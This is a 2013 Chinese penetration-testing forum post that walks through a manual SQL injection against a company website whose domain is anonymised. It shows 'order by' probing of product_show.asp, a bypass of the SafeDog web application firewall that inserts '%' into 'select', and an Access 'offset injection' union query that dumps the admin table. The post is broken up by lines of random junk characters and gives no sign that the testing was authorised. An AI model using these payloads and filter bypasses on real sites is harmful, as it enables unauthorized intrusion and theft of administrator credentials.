中国网络渗透测试联盟
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
[打印本页]
作者:
admin
时间:
2013-3-8 21:49
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。
& W/ h& e4 m/ A3 C" j
4 B0 R7 W, ]* _+ ^( I
/ q& A: W5 O, r# S6 N
顺手加个admin
; l" F! w! O* I% o2 `
4 p% H+ p" I5 X8 O t0 y |& U
d0 {3 i; s+ W7 d9 |: h; {
默认后台。
2 C2 J% H/ a* d% c3 U
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
7 _$ d# k0 {4 D1 Q) I$ q
1 W( f1 ~: K, G. w7 V
+ O4 E1 c! F9 K N
6 l) i" L, W9 i7 R# r
所以就不用御剑扫了,待会直接封IP。
" I# _+ p; y$ ?
- t, _" d# J# _) M& P4 F# }
用order by语句判断是否存在注入。
5 s7 y- b, Z9 y
http://www.xxx.com
/product_show.asp?id=997 order by 1
1 `8 b5 O. W! S2 t9 j {6 I. b
http://www.xxx.com
/product_show.asp?id=997 order by 100
8 b% t( g7 v( z# Y3 [3 O( D
现在存在注入,经测试后发现是9个字段。
0 u+ g y! q/ q# _
. Q# x W% s' Z1 k, r
接下来进行联合查询,猜是否存在admin表。
) H K$ T9 Z+ l* k" U
http://www.xxx.com
/product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
6 Q, d5 x( W9 Q9 R+ ^; v
- [3 [, Q7 Y6 l
4 X k) P4 R+ M2 A" l
+ L, S; ~' r9 j' ?
在select中间加个%,se%lect绕过安全狗。
) o" x p) [- v
$ J+ S* e1 g b7 Q- w
q2 }% _% g, {2 W. r, l2 b
发现存在admin表,然后开始手工猜常用的字段。
* x4 e% R) H# S, F! Y
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
5 k9 ^, A4 S1 S" Z. t7 \7 V
) o, v& ~( g0 K* Y" Q
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
6 P; R$ ^' ~' A4 \) U; y5 V
/ s0 G/ a+ _" P N
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
- y+ V" C4 O. F% j7 K J. e' L
http://www.xxx.com
/product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
4 U- o1 ]% O, x- j
好了,敏感内容出显了。
% V0 x" K2 G& ]% `: S
" {9 i# v! B6 {) d4 ] g* _- _" `/ X
/ P1 {7 A1 g% c9 S# x
) o0 C- ^# h2 p6 ]+ h" J; F5 M& I
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2